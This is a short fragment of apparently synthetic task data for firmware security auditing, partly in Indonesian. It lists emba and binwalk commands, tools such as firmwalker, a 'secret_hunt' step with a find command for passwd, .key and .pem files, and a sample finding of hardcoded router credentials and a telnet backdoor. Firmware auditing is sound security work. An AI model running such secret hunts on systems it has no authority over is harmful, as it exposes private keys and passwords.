        "emba -f firmware.bin -l emba_output/ -d",
        "find . -name 'passwd' -o -name '*.key' -o -name '*.pem'"],
       ["firmware_extract","filesystem_scan","secret_hunt","vuln_assess"],
       [("binwalk","firmware extraction dan analysis"),("firmwalker","firmware security scanner"),
        ("emba","embedded firmware security analyzer")],
       "emba membutuhkan waktu lama (30-60 menit) — jalankan background",
       "router firmware — hardcoded creds admin:admin12345, telnet backdoor port 9999",
       "IoT security researcher",
       "Firmware extraction: binwalk -e firmware.bin → SquashFS filesystem extracted"),
]
